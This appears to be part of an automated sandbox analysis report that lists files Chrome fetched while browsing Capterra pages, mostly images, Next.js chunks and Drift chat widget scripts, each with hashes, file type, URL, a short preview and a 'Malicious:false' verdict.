                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkCggXCyfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxEiJTB:+zNg/PvjXjnWJVLAb0MgVnEHOJAuUvi4
                                                                                                                                                                                                        MD5:6E96EFF760A568F7BD67DF9BE2454FDD
                                                                                                                                                                                                        SHA1:CA3376553209AB4384165330069C6221C66F866A
                                                                                                                                                                                                        SHA-256:08DD507F27923557ECB1D8F4504A2851336ED0167E60B56B61FA111D9F05BD6F
                                                                                                                                                                                                        SHA-512:7B7F498ACB9ECFED1B6CA48B32BAB9799B3381491CEF5884BEDD09BE597503E705B169891CA8A402A83CBA58070D96CDD404C3B13AE4EAB5C88164F9474C40C9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"3ob5sl3RSLbslH6LvzUKQc","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insights.capterra.com","capterra.com/works
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x630, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41524
                                                                                                                                                                                                        Entropy (8bit):7.815950283471118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4P8z1kqCrfzYT2Q52cVE82RiIh1tlAZ2J4X2h2/kE2IRM3WMNBxg83OiBBBBzOrA:PyrYaQ0cVEVv1tlAUJ4Xf/kdIRM3W6j/
                                                                                                                                                                                                        MD5:213DB640AEB446E202E39C342FD4D357
                                                                                                                                                                                                        SHA1:B6A3E60804F944758364323FB78758F2CBDFB30A
                                                                                                                                                                                                        SHA-256:8A9936FAAA2D12FA4976D7342B9B8A4DF0DF5F78BD263641C36DC1D286BCC11E
                                                                                                                                                                                                        SHA-512:B4CA3599E2FB76EDF7858E746CEA28BD0CB117BE4DE78CE306385F2270B64EF9DA672443B0A57F02B45F4BA6372A7CB04F85D50C884FB71181E52B26D6318BE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*................/http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:AEE2157787CB11E9BB4D827CB3ECCADD" xmpMM:DocumentID="xmp.did:AEE2157887CB11E9BB4D827CB3ECCADD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AEE2157587CB11E9BB4D827CB3ECCADD" stRef:documentID="xmp.did:AEE2157687CB11E9BB4D827CB3ECCADD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".......C................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6391
                                                                                                                                                                                                        Entropy (8bit):4.451055422231384
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:zvfUCL/YeF//9fGDGpcGRfuCZtkPZ3BoaSoeX+XVC+4taZ2FlTSTOS5ROS0c:jUCkeF9SGpc+GitkPZ3yaSTX+0+ySNjf
                                                                                                                                                                                                        MD5:C40719CE20E0E42810B148093800381B
                                                                                                                                                                                                        SHA1:5E30A1016FDB627A94D88E7C9D2A895AAB3012D2
                                                                                                                                                                                                        SHA-256:DAC67355D5A76833F50C5B48FA6667ECB06FD7A394F370669562E5AFB73E49ED
                                                                                                                                                                                                        SHA-512:3E26A41009C3C33BB342183417DBAC6A0A24394A98390F6FA883D740CF9C04D29DF837C82FB9A8A91AABE47B12DFFD200EF3287B78287401AF83C9C4CA1FE4B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 22.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 1639 350" style="enable-background:new 0 0 1639 350;" xml:space="preserve">.<style type="text/css">...st0{fill:#F25022;}...st1{fill:#FEFEFE;}...st2{fill:#80BA01;}...st3{fill:#777777;}...st4{fill:#02A4EF;}...st5{fill:#FFB902;}.</style>.<g>..<path class="st0" d="M0,0h166.5c0,55.5,0,111,0,166.5c-55.5,0-111,0-166.5,0V0L0,0z"/>..<path class="st1" d="M166.5,0h17c0,55.5,0,111,0,166.5c55.5,0,111,0,166.5,0c0-55.5,0-111,0-166.5h1289v129.5...c-11.9,0-23.8-0.1-35.6,0.1c-0.3-15,0-30.1-0.1-45.1c-11.9,3.6-23.7,7.4-35.6,10.8c-0.3,11.4,0,22.8-0.2,34.2...c-17.6,0-35.1,0-52.7,0c0.2-9-0.6-18,0.7-27c1.1-7,5.2-14.1,12-16.8c8.7-3.5,18.3-1.2,26.5,2.4c-0.1-10.3,0.1-20.6-0.1-30.9...c-17.3-4.8-37.1-3.8-52.5,6.2c-9.9,6.3-17.1,16.5-20.3,27.7c-3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10571), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10571
                                                                                                                                                                                                        Entropy (8bit):5.205561835805551
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xr1PCZrIJCG4tCo5Cd7Yri8CoZxTC1rACCHmv+2C1JzC7WCTfOWxBWC/:X4tCwCdSZ5CX+2CeWCTN
                                                                                                                                                                                                        MD5:000591653CAE1D7A750E9DFEF1A863B3
                                                                                                                                                                                                        SHA1:8F9D8B263720FA8D31C617C587E26DD899FC0099
                                                                                                                                                                                                        SHA-256:B41FF1BE3882AF8CC09AB3A5E557F5A981B609D5AA09D4DEDD4CC554BCE884BE
                                                                                                                                                                                                        SHA-512:F2AEB082309A1E315F305D4B274D94CFFFCFCB0318D08BFDE51001FB92C576098790D3D297C535A716E214E196DDD09C2C2CC098047DD3566B974C41EF833D1B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/8090-049e325add61e698.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8090],{70164:function(r,t,e){e.d(t,{Z:function(){return v}});var n=e(7653),o=e(57908),i=e(96890);function a(r){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var c=["gapless","align","className","children"];function u(){return(u=Object.assign?Object.assign.bind():function(r){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n])}return r}).apply(this,arguments)}var l=e(10803);function f(r){return(f="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var s=["variant","className","children"];function b(){return(b=Object.assign?Object.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 640x360, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29419
                                                                                                                                                                                                        Entropy (8bit):7.968988100151472
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:CG4Eg/ci5Tqox6pKfr7uRfNj98AhMWKNBUhsYhLVt7Bg:n4rd5TqoSKfr7o9ewsGLL7i
                                                                                                                                                                                                        MD5:04072FA4423EE9990B9DE710F993FDBE
                                                                                                                                                                                                        SHA1:7EDCF1561089D33E16B4B874638A03E7B17F7EC4
                                                                                                                                                                                                        SHA-256:2A3B9B15E2A63F030C54990897533F9CCB154FA955DAE91097963C3D2E928D6E
                                                                                                                                                                                                        SHA-512:43448D839F098DCA217201D98450D76A946AC9E2242E1EC478CF061735CF4AF3F8A544BBE822C2C81AAF51FDF1287DE1C4280644D594E8528C7902A637E10434
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......h...."....................................................!..@......0......=Q..a.................k...Q..w~8...~\.........$.v..y{+..=..,..]....L........^Y.....'.b....oC.-...C)..Cm..A5....ky.|.R.3Q[.+.{.......?w......\........l.....X.@..e..i.,2.....9..K.j....Q'.u..~.a.gq?..x.XZmR....kG?....j6.1..Z.. .t....P..K..}so.<...s.XO.c.qI}..V.........t..&.h.=......_.|.1.C.y8.r .5.;..Y[%.2..v5V....iD..,..A.B..#.4=S....z/]...G...1.Zh5g....a..^...j..71T.o..e. Z.$c&........q.s..!J...X....i.v...-.....0[.?k..A,.Om......F2hz..t..c..-.. ..y..i.`..m..N.t=s.=W]...=-.V...n.Z..1V..H.H.M.O....@.|.... .H...ou}B.c.n6...N.w>...k..Y...8........4=?.[.TO.n..".4.;..B...t...]b9.A....NjW..^..J...."c&...n ..|...7.....iS...f....y..@F.Z."&2hz....K..i.v..?0.:.P....H.......\X...T.N...iv#H...9...@....DLd.....{.\........<..:.t.t..!...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):77
                                                                                                                                                                                                        Entropy (8bit):4.37144473219773
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:k0WYL12AvZ/W6QfpX/W6Qee:UYR2AvZO6EpXO6I
                                                                                                                                                                                                        MD5:B6652DF95DB52FEB4DAF4ECA35380933
                                                                                                                                                                                                        SHA1:65451D110137761B318C82D9071C042DB80C4036
                                                                                                                                                                                                        SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                                                                                                                                                                                                        SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):964
                                                                                                                                                                                                        Entropy (8bit):6.676092008852513
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+zx/gjluKoqZ/IqzCCO/lx1T9sAG3vnayQYcfo/LlDzUAhomcVWLsaVgIxsYe4:+zxYjPNzB+YnQYmSZDpvcRaKOsYz
                                                                                                                                                                                                        MD5:39A6A3CC25B51368A27880A88B966FD8
                                                                                                                                                                                                        SHA1:E9C6A870896C3717E7A9EBD45278E1020CDE6E2E
                                                                                                                                                                                                        SHA-256:7CCE1E091C0C125FD745610C6567E69BAE431EA510387CBDE91281C6A35B8F09
                                                                                                                                                                                                        SHA-512:BBBDBAB9E2B9D1259A8762B22F29A66A96E33B6D72DA5CC24364C5968E3EA08B5E4D44037253A5DB10A89FBC3F3B3F81BC159FEAB79932A8CEAE2F64BB644EA9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe....... ... ....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat......?..2.....1@. .>4HD4....|%...[....D...w./..l6.X...M.`.ih...L(.9VN^.0...4Tn.Kv.m..4.+..*S..<...T0S....#.].....f..Nw..*..6.Y.....".?......U..#xRk...T.../....do....X.=eK.K....O...Y..T.'..]...{..UtD....T..#.........%.2.9..SA...p..........J.Sc...^..&v.Oi..d.O.C.y....(..j@..3...C}.O..R0.....K.f.OZ4N.....u......L.#.....E.;..<..g..T..w.o...2.K...........k/0.I..%...-....,.C..BnxR...u.g..K.A......dc....|o.R..A..i.=t....L...E.r...^...V..Y........D.s.n....g....,..F...L4.c........?...h4 2.....0..C.?..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12171), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12171
                                                                                                                                                                                                        Entropy (8bit):5.624089232766486
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:FunkwfFLK41ASTAaJ2MOWoOfGpwo3QhDiO0GnMp1nkin705L5z1hJbaZ6:FuFfFn1TxvfGpAh+KnMp1kin70tdAM
                                                                                                                                                                                                        MD5:D10EC0F09D5AAB828F95E8BFE3992BE5
                                                                                                                                                                                                        SHA1:4808794C39484179E13BCFA039D3A7A09306E02D
                                                                                                                                                                                                        SHA-256:1CC551EBBAA689077BBD1C977D3BFCC652BF921FF2E67C21027AEE8E0B3EF078
                                                                                                                                                                                                        SHA-512:A1BA974B73F884E90CC449D494354B45F910EB6678AD89057072B35AE2C0920FE665C1726B1484208B685AF1AC89C46A3C3DFE5A9FFD8A24741E1C1F7F744942
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/app/error-9682a885aaf0d297.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7601],{14488:function(e,t,n){Promise.resolve().then(n.bind(n,36493))},36493:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return u}});var r=n(27573),i=n(34617),a=n(8558),o=n(13243);function u(){return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(a.Z,{useGdmAnalytics:!0,noClickOuts:!0}),(0,r.jsx)(i.ScreenContainer,{children:(0,r.jsx)(o.Custom500,{})})]})}},65880:function(e,t,n){"use strict";n.d(t,{default:function(){return i.a}});var r=n(25839),i=n.n(r)},13243:function(e,t,n){"use strict";n.d(t,{Custom500:function(){return o}});var r=n(27573),i=n(65880),a=n(39360),o=()=>(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)("title",{children:"We're experiencing an internal server problem. (500)"}),(0,r.jsxs)("div",{"data-testid":"500-page-error",className:"m-4xl flex flex-col justify-center md:flex-row",children:[(0,r.jsxs)("div",{className:"w-full md:w-7/12",children:[(0,r.jsx)("h1",{className:"mb-xl leading-3xl text-3xl font-bo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):609249
                                                                                                                                                                                                        Entropy (8bit):6.007587187918157
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:AUA3ZObe1rlf84Nr+rqqAm/842wTwezcBTXIfLrfagTF1:DGMb6Xq1Am/YwpeoJ1
                                                                                                                                                                                                        MD5:5D0CA95E3882606D49AC7840249DB6AF
                                                                                                                                                                                                        SHA1:919AEF97EE44C0D3BE5D1904C1B236B3A7B4F3A0
                                                                                                                                                                                                        SHA-256:6E4F31393DDF457DBDDB1DB5B11A74E33E2CA2B2BA46B593A4CD3607296DC53E
                                                                                                                                                                                                        SHA-512:77FD0237A002A2B4ED6395A644C3FAC995B8E46FE67FF2834E6718C75D10133711661FE7C71EB6BE2EA088E5CA727C0EE94D06F84FBA33086901621DF2C5F750
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/macOS_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>5</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (41615), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):41615
                                                                                                                                                                                                        Entropy (8bit):5.444256318975822
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:LO0+9wEc/BCBfOn/3G8C+zNkikT8S06cdRIY1jQjzJufN+kDY9IlFCFStuhisWV9:K0xmBliel/w1DYqFCFSIisD5vHtQFEW
                                                                                                                                                                                                        MD5:CE626BD1589094FF48CDD39BE433A73B
                                                                                                                                                                                                        SHA1:1D43144A1AE47FB08E4371FFA10B7AE65FDB7712
                                                                                                                                                                                                        SHA-256:B5C53697456A79C40F0315E43F627C9D6E2AB4667C65048EA2B8B5A8A786C6AA
                                                                                                                                                                                                        SHA-512:1390FC67AD9B0D259C8399E4AACEF6C5B06296D9E67D8027ECA515280F4AF03E5324A8516253F04DD2DFEF1D722A24FCB0857C47AA447E3EECFBE7160176316F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/17.17dea2aa.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{"+D5C":function(e,t,n){"use strict";n.d(t,"c",function(){return r}),n.d(t,"b",function(){return o}),n.d(t,"a",function(){return a});var r=Object.freeze({CHAT:"chat",USER:"user",PRESENCE:"presence",VISITOR_PRESENCE:"visitor_presence"}),o=Object.freeze({CHAT:"chat",USER:"user",ORG_PUBLIC:"live",LIVE:"live"}),a=Object.freeze({CHAT:"chat",USER:"user",PRESENCE:"presence"})},"+Zvl":function(e,t,n){"use strict";var r=n("QtlZ"),o=n("ILQF"),a=n("H/qh"),c=["__DRIFT_WIDGET_RECEIVE_CHANNEL","REPLACE_STATE"];t.a=function actionSyncMiddleware(){return function(e){return function(t){return t._foreignDispatch||Object(a.a)(t.type,c)||r.a&&r.a.name&&Object(o.a)({topic:"".concat(r.a.name,":action-dispatch"),message:{action:t}}),e(t)}}}},"0lfv":function(e,t,n){"use strict";n.d(t,"j",function(){return _}),n.d(t,"q",function(){return A}),n.d(t,"g",function(){return forceFocus}),n.d(t,"r",function(){return I}),n.d(t,"s",function(){return j}),n.d(t,"e"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):69
                                                                                                                                                                                                        Entropy (8bit):4.057426088150192
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YGKeMfQ2pHWiR8HopHW4OE9HsuXU9WyRHfHyY:YGKed2pHD5YEl5k9zyY
                                                                                                                                                                                                        MD5:B04CD3F8043EF04F417D4B0E4BCBBC03
                                                                                                                                                                                                        SHA1:88F259A4AE3045409B3657E7D7A791D321BA9DCE
                                                                                                                                                                                                        SHA-256:59E58524340CD7AD353BE010374B124C242FDDE10A0ED41047FE2FD4BB9E5A2E
                                                                                                                                                                                                        SHA-512:A285C493B939D2A165D80F87FC830F5D02AFCC7A8EA1C5CAF9CAA87ABD286F1C98598FFD83023044BDB23D344C60EEF6A6C4BFEDEDD42A4297A0AC09E22FA5B2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                                        Preview:{"country":"US","state":"NY","stateName":"New York","continent":"NA"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                        Entropy (8bit):4.33221219626569
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LUfQ2pHWiR8HopHW4OE9HsuXU9WyRHfHyI:x2pHD5YEl5k9zyI
                                                                                                                                                                                                        MD5:1AE6B27EBA211F4CFCD99B904DA88BB7
                                                                                                                                                                                                        SHA1:53CA38F083C4A21F2EDA633EC304CB4582EDEDA2
                                                                                                                                                                                                        SHA-256:961635B4E9661208EC118D285B3AC1DBF9F3CC96CDDC97F30E55CD2C6566448C
                                                                                                                                                                                                        SHA-512:7DD325AB05B1A419614C2C39224C11E1388F09BCA5EA0F56811E6842B4FB243BCB53AA2BDDE00A94FBC324222B47924152C183337EB390F58C59AC80E89593B6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:jsonFeed({"country":"US","state":"NY","stateName":"New York","continent":"NA"});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):185
                                                                                                                                                                                                        Entropy (8bit):5.230362293506695
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:XzOYNRfdHhOYNRfcZqVRNmT9STdEyqYxcF5cSI7UNCC5K6cJYpfMPYfNdS7ZRMYO:XzjbdHhjbzrmhSTmyqScF27UNCMsQMPC
                                                                                                                                                                                                        MD5:043FBC58B46202BA018E6393F1307A09
                                                                                                                                                                                                        SHA1:509101DA3F22B4F13D4C57799195E70B00993893
                                                                                                                                                                                                        SHA-256:A0B116C9DC488DB452FC9843C0B8A67ECEDCC704CA7FDCD43A3F88BDA89FE78E
                                                                                                                                                                                                        SHA-512:923B92B03D90B97FFE1F286D5851ED7367199EC0FA87E7768A94EC0B10E0BA555243EB46396BDA87BDDBEBE9214B5D05C35CC50948577019B12077710BFD7400
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/5664.58cbb27e06b11751.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5664],{85664:function(n,u,c){"use strict";c.r(u),c(16131),c(27872),u.default=()=>null},16131:function(){},27872:function(){}}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2864
                                                                                                                                                                                                        Entropy (8bit):3.93087721569185
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:UhLLHc686gk/xH481FA/WcrqIAdc4SRdTFr5:UG6m+cdRpX
                                                                                                                                                                                                        MD5:5143AFE4271E84EE4381142E500BE867
                                                                                                                                                                                                        SHA1:D30A5D3A107188BC40F247FD316D975AE03FFD7E
                                                                                                                                                                                                        SHA-256:F8229AF6912F6F45E3BD2426E18986578083C61C9586D7CC6ED029DB3AE02E27
                                                                                                                                                                                                        SHA-512:D55E75CF360505ACCB3FA4750BAD1D739996A64F87796167F1E92B11985CB732EB996661CECFECB70D6B0AF5D05F4E4490545F105F0752D7AFB548D6686A1AF8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var drift_tracking = (function() {.. return {.. setUserAttributes: setUserAttributes = (sessionData) => {.. drift.on('ready', function() {.. drift.api.setUserAttributes({.. account_id: sessionData.account,.. adgroup_id: sessionData.adgroup,.. bg_querystring: sessionData.bg_querystring,.. campaign_id: sessionData.campaign_id,.. conversion_page_h1: sessionData.conversion_page_h1,.. conversion_page_url: sessionData.conversion_page_url,.. country_code: sessionData.country_code,.. dclid: sessionData.dclid,.. ga_ad: sessionData.ga_ad,.. ga_adposition: sessionData.ga_adposition,.. ga_campaign: sessionData.ga_campaign,.. ga_client_id: sessionData.ga_client_id,.. ga_content: sessionData.ga_content,..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5530
                                                                                                                                                                                                        Entropy (8bit):4.32585039019299
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:cLDH7lTCDBIyjjw6TQJnE3op4Ani5OZC3dEQy8AE88RJrAta6LkN2DPz9eF+vY0v:UhTC1IyjjwtJnEYVni5l3dEAAE88Qs6P
                                                                                                                                                                                                        MD5:106975D56D45997E9D3BDF754D47E2B6
                                                                                                                                                                                                        SHA1:4F68393DD2B6B847D8A83C0E2A2BBEE4CF35D580
                                                                                                                                                                                                        SHA-256:60A60CFD55864E76A5FEC5C851CA9898363BAC5027E081B9CE6C4A4325FD197A
                                                                                                                                                                                                        SHA-512:03F644DBA0672743876E32F0B8FF3CF55E873CF7621FFEFD8148F0FFD2FA3FACA87DA83587AFAB27C687BFB9AFBEE5377642DA85A4E750FFA0CF900E74BF10D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:xlink="http://www.w3.org/1999/xlink". version="1.1". width="603". height="182". style="fill:#221f1f". id="svg1936">. <path. d="m 374.00642,142.18404 c -34.99948,25.79739 -85.72909,39.56123 -129.40634,39.56123 -61.24255,0 -116.37656,-22.65135 -158.08757,-60.32496 -3.2771,-2.96252 -0.34083,-6.9999 3.59171,-4.69283 45.01431,26.19064 100.67269,41.94697 158.16623,41.94697 38.774689,0 81.4295,-8.02237 120.6499,-24.67006 5.92501,-2.51683 10.87999,3.88009 5.08607,8.17965". id="path8". style="fill:#ff9900" />. <path. d="m 388.55678,125.53635 c -4.45688,-5.71527 -29.57261,-2.70033 -40.84585,-1.36327 -3.43442,0.41947 -3.95874,-2.56925 -0.86517,-4.71905 20.00346,-14.07844 52.82696,-10.01483 56.65462,-5.2958 3.82764,4.74526 -0.99624,37.64741 -19.79373,53.35128 -2.88385,2.41195 -5.63662,1.12734 -4.35198,-2.07113 4.2209,-10.53
